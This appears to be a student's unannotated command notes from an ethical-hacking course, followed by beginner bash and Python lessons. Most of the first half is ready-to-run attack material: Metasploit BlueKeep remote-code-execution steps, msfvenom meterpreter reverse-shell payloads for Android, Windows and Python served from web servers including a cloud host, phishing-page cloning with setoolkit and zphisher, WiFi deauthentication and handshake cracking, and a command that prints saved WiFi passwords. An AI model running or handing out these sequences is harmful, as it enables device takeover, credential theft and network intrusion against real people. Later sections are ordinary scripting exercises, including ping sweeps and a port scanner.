    else
    {
        printf("\n Correct password\n");
    }
    return 0;
}

nc 192.168.0.165 9999

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 700

search cve-2019-0708
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
show options
set RHOSTS 192.168.0.165
exploit

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
show options
set RHOSTS 192.168.0.165
set LPORT 4567
show options
show targets
set target 2
exploit

lbd flipkart.com
wafw00f https://hackerschool.in

jsmith
demo1234

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.187 LPORT=5566 R -o /root/Desktop/msf.apk

cp msf.apk /var/www/html
service apache2 start

msfconsole
use multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.0.187
set LPORT 5566
exploit -j

IN ANDROID
192.168.0.187/msf.apk

meterpreter > sysinfo


apt update
apt install apktool
apktool d msf.apk

cd msf
ls
mousepad AndroidManifest.xml

unzip -d android msf.apk
cd android

apt search dex2jar
apt install dex2jar
d2j-dex2jar classes.dex

apt search jd-gui
apt install jd-gui
jd-gui classes-dex2jar.jar

apt search adb
apt install adb
adb devices
adb connect 192.168.0.153:5555
adb devices
adb shell

adb devices
adb connect 192.168.0.102:5555
adb devices
adb root
adb shell
x86_64:/ # logcat

https://gofile.io/d/wiEKQk
unzip -d test DivaApplication.apk
cd test
d2j-dex2jar classes.dex
jd-gui classes-dex2jar.jar

/data/data/jakhar.aseem.diva/shared_prefs

x86_64:/data/data/jakhar.aseem.diva/databases
sqlite3 ids2
sqlite> .tables

sqlite> select * from myuser;

adb shell am start -n jakhar.aseem.diva/.APICredsActivity

cd Downloads
chmod 400 CSP1.pem
ssh -i "CSP1.pem" kali@ec2-3-87-131-107.compute-1.amazonaws.com
sudo passwd root
su root
apt update
apt install apache2
service apache2 start
apt install msfpc
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=3.87.131.107 LPORT=5599 -f exe -o /var/www/html/win.exe

msf6 exploit(multi/handler) > set LHOST 172.31.43.146

setoolkit
1
2
3
2
KALI IP ADDRESS
URL

IN BROWSER ENTER THE IP ADDRESS

ssh -R 80:localhost:80 serveo.net

git clone https://github.com/htr-tech/zphisher.git
ls
cd zphisher
ls
./zphisher.sh

cd /etc/setoolkit
mousepad set.config
APACHE_SERVER=ON
ctrl+s

cd /var/www/html
rm -rf *

setoolkit
1
2
3
2
KALI IP ADDRESS
https://altoromutual.com/login.jsp

cd /var/www/html
ls

iwconfig
airmon-ng start wlan0

airodump-ng wlan0mon

airodump-ng --essid "Hack-Me" --bssid 60:63:4C:6F:3E:59 --channel 1 --write wifipasswordcracking1 wlan0mon

aireplay-ng -0 10 -a 60:63:4C:6F:3E:59 -c 04:92:26:9F:9B:C3 -e "Hack-Me" wlan0mon

aircrack-ng wifipasswordcracking1-01.cap -w /usr/share/wordlists/wifite.txt

wifite --dict /usr/share/wordlists/wifite.txt

fern wifi cracker

netsh wlan show profile name="Wi-Fi name" key=clear

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.0.187 LPORT=4567 -f raw -o /root/Desktop/rasp.py
cd Desktop
python -m http.server

msfconsole
use multi/handler
set payload python/meterpreter/reverse_tcp
set LHOST 192.168.0.187
set LPORT 4567
exploit -j

wget http://192.168.0.187:8000/rasp.py
chmod +x rasp.py
python rasp.py

touch pgm1.sh

mousepad pgm1.sh

#!/usr/bin/bash
echo "Hello World"

chmod +x pgm1.sh

./pgm1.sh
/usr/bin/bash pgm1.sh

#!/usr/bin/bash
echo "Hello World"

name=hackerschool
pincode=560041
echo $name $pincode

ip2=192.168.0.107
portno=22
echo "scanning for ip $ip2 on portnumber $portno"

user="`whoami`"
echo $user

user1=$(whoami)
echo $user1

Arithmetic such as 10+5 is written inside $((...)), e.g. $((10+5))
#!/bin/bash

echo "Enter the first number: "
read num1
echo "Enter the second number: "
read num2

result=$((num1+num2))
echo "The answer is $result"

#!/bin/bash

result=$(($1+$2))
echo "The answer is $result"

NOTE: ./add.sh 10 5

#!/bin/bash

num1=10
num2=5

result=$((num1+num2))
echo "The answer is $result"

#!/bin/bash
read -p "Enter the username:" username
read -sp "Enter the password:" password

echo -e "\n the username is $username and password is $password"


-e enables escape characters such as \n in echo

if [ condition ]
then
perform
fi

if [ condition ]
then
perform
else
perform
fi
if [ condition ]
then
perform
elif [condition]
then
perform
else
perform
fi

#!/bin/bash
read -p "ENTER THE YEAR:" year
if [ $year -lt 2024 ]
then
echo "past"
elif [ $year -gt 2024 ]
then
echo "future"
else
echo "present"
fi

age<18 (YOUNG)
age>18 (ADULT)
age=18 (YOUNG AND ADULT) (-eq)

#!/bin/bash
read -p "ENTER THE age:" age
if [ $age -lt 18 ]
then
echo "YOUNG"
elif [ $age -eq 18 ]
then
echo "YOUNG AND ADULT"
else
echo "ADULT"
fi

for <var name> in <list>
do
<perform>
done

for i in 1 2 3 4 5
do
echo $i
done

#!/bin/bash
for word in {a..z}
do
echo $word
done

#!/bin/bash
for i in {1..2}
do
echo $i
done

#!/bin/bash
for ip in {100..150}
do
ping -c 1 192.168.0.$ip | grep "bytes from"
done

TRY WITH ARG AND USER INPUT

#!/bin/bash
echo "RUN SCRIPT USING COMMAND ./pingsweep.sh 192.168.0"
for ip in {100..150}
do
ping -c 1 $1.$ip | grep "bytes from"
done

#!/bin/bash
echo "ipaddress format:- 10.0.0"
echo "ENTER IP ADDRESS TO SCAN: "
read ipaddr
for ip in {100..150}
do
ping -c 1 $ipaddr.$ip | grep "bytes from"
done

#!/bin/bash
echo "ipaddress format:- 10.0.0"
echo "ENTER IP ADDRESS TO SCAN: "
read ipaddr
for ip in {100..150}
do
ping -c 1 $ipaddr.$ip | grep "bytes from" | cut -d " " -f 4 | tr -d ":"
done

#!/usr/bin/python
print ("Hello world")
print ('Hello world')

print (50+25)
print (23-5)
print (3*67)
print (15/3)

print ("""please enter the input
scan started""")

name="HACKERSCHOOL"
place="BANGALORE"
a="new"
b=22

print ("welcome to " + name + " from " + place )

x=input("enter your name: ")
print ("your name is " + x)

#!/usr/bin/python
x=input("Enter the first number: ")
y=input("Enter the second number: ")
z=int(x)+int(y)
print ("THE RESULT IS " + str(z))

a = int(input("Enter first number :"))
b = int(input("Enter Second number :"))
result = a + b
print(result)

#!/usr/bin/python
port = ["80","8080","443","8443"]
print(port[1])
print(port[2])
print(port[0:4])

fruits = ["apple","orange","graps"]
print(fruits[2])
port.append("8081")
print(port)
port.remove("8080")
print(port)

if <condition>:
    <perform>
else:
    <perform>

if <condition>:
    <perform>
elif <condition>:
    <perform>
else:
    <perform>

#!/usr/bin/python
num=input("Enter your age: ")
if int(num)>60:
    print ("You are old")
else:
    print ("you are adult")

#!/usr/bin/python
num=input("Enter your age: ")
if int(num)>60:
    print ("You are old")
elif int(num)>=18:
    print ("you are adult")
else:
    print ("you are young")

for <var name> in <list>:
    <perform>

#!/usr/bin/python
food=["fruits","veg","seed"]
for line in food:
    print(line)

#!/usr/bin/python
file=open ("/root/user.txt","r")
for line in file:
    print(line)

#!/usr/bin/python
import sys
print (sys.version)

#!/usr/bin/python
import socket

host="127.0.0.1"
port=1234

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))

nc -nlvp 1234

#!/usr/bin/python
import platform
import os

# Enter the network prefix including the trailing dot, e.g. 192.168.0.
network_ip=input("Enter ip address to scan: ")
first_host=int(input("enter first ip: "))
last_host=int(input("enter last ip: "))

oper=platform.system()

# Windows ping takes -n for the count, Linux and macOS take -c
if (oper=="Windows"):
    ping="ping -n 1 "
else:
    ping="ping -c 1 "

print ("START SCAN")

# range() stops before its end value, so add 1 to include last_host
for ip in range(first_host,last_host+1):
    addr = network_ip + str(ip)
    command = ping + addr
    response = os.popen(command)
    lines = response.readlines()   # renamed from "list" so the builtin is not shadowed

    # Linux ping prints "bytes from", Windows ping prints "Reply from"
    for line in lines:
        if("bytes from" in line or "Reply from" in line):
            print(addr)
            break

print ("scan end")

#!/usr/bin/python
def add (a,b):
    print (int(a) + int(b))

x=input("enter a: ")
y=input("enter b: ")
add (x,y)

import socket
from datetime import datetime

def port_scan(target, start_port, end_port):
    # Print the starting time of the scan
    print(f"Scanning {target} from port {start_port} to {end_port}...")
    start_time = datetime.now()

    # Iterate through the specified port range
    for port in range(start_port, end_port + 1):
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(1)  # Set a timeout for the connection attempt
        result = sock.connect_ex((target, port))  # Try to connect to the port

        if result == 0:
            print(f"Port {port}: Open")
        else:
            print(f"Port {port}: Closed")

        sock.close()

    # Print the total time taken for the scan
    end_time = datetime.now()
    duration = end_time - start_time
    print(f"\nScan completed in: {duration}")

if __name__ == "__main__":
    # Specify the target and port range
    target_ip = input("Enter the target IP or hostname: ")
    start_port = int(input("Enter the starting port: "))
    end_port = int(input("Enter the ending port: "))

    port_scan(target_ip, start_port, end_port)
